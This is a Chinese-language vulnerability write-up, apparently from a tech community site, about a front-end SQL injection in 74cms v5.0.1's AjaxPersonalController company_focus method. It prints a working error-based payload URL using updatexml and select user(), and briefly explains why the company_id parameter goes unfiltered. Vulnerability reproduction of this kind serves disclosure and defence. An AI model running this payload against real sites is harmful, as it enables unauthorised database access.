74cms v5.0.1 前台 sql 注入

发布于 2024-11-08 11:45:08 字数 1153 浏览 11 评论 0

一、漏洞简介

74cms 5.0.1 前台 AjaxPersonalController.class.php 存在 SQL 注入

二、漏洞影响

三、复现过程

具体信息

文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

方法:function company_focus($company_id)

是否需登录:需要

登录权限:普通用户即可

Payload:

http://0-sec.org/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id [0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a

源码分析:

文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

company_focus 方法是参数化函数,$company_id 参数是不经过 I 函数过滤的,所以只要 where 可以控制,那就可以注入

跟踪 add_focus(),发现 SQL 语句参数外部都可以控制,导致了注入漏洞

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

寄意

暂无简介

0 文章
0 评论
24 人气
更多

推荐作者

lixs

文章 0 评论 0

敷衍 

文章 0 评论 0

盗梦空间

文章 0 评论 0

tian

文章 0 评论 0

13375331123

文章 0 评论 0

你对谁都笑

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文